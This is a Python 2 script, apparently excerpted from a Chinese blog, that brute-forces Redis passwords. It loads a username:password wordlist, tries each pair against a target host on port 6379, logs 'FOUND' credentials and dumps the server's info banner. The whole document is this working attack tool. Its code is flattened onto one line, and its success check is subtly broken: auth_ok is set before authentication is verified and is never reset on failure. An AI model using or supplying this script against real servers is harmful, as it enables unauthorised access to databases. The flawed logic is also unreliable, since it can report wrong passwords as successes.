本文摘自 import redis import logging LOGIN_TIMEOUT = 12 class RedisAuth: #初始化 def __init__(self, (host, port)): self.addr = (host, port) print self.addr #login函数,有三个参数,self,username,password def login(self, username='', password=''): conn_ok, auth_ok, banner = False, False, '' connection = None try: #连接redis #redis.StrictRedis(host='localhost', port=6379, db=0, password=None, socket_timeout=None, connection_pool=None, charset='utf-8', errors='strict', decode_responses=False, unix_socket_path=None) connection = redis.StrictRedis(host=self.addr[0], port=self.addr[1],password=password,db=0, socket_connect_timeout=LOGIN_TIMEOUT) conn_ok = True auth_ok = True print password info = connection.info() banner = str(info) logging.getLogger().warn('FOUND %s:%s@%s:%d' % (username, password, self.addr[0], self.addr[1])) except Exception as e: es = str(e) if es.find('Password') >= 0: conn_ok = True else: conn_ok = False logging.getLogger().info('ERR:1 %s:%d %s' % (self.addr[0], self.addr[1], es)) print es del connection #删除变量connection return conn_ok, auth_ok, banner class RedisBruteTester: def __init__(self, userdict, passwords=None): self.userdict = userdict pass def test(self, task): (host, port) = (task[0], task[1]) rs = [] auth = RedisAuth((host, port)) # print self.userdict for username in self.userdict: for password in self.userdict[username]: conn_ok, auth_ok, banner = auth.login(username, password) print conn_ok,auth_ok,banner if not conn_ok: # return rs continue if not auth_ok: continue rs.append([host, port, 'REDIS', username, password, banner]) break if not rs: logging.getLogger().info('SAFE %s:%d' % (host, port)) return rs if __name__ == '__main__': host,port = "需要暴力破解的host",int('6379') userdict = dict() for ln in open('c:\\redis_userpasswd.txt'): fs = ln.strip().split(':', 1) if len(fs) != 2: continue username = fs[0] password = fs[1] if username not in userdict: userdict[username] = set() userdict[username].add(password) # logger = xutils.initLogger('.\\pass\\redis.txt') tester = RedisBruteTester(userdict) rs = tester.test((host, port)) if rs == []: print('Faild') else: print(rs)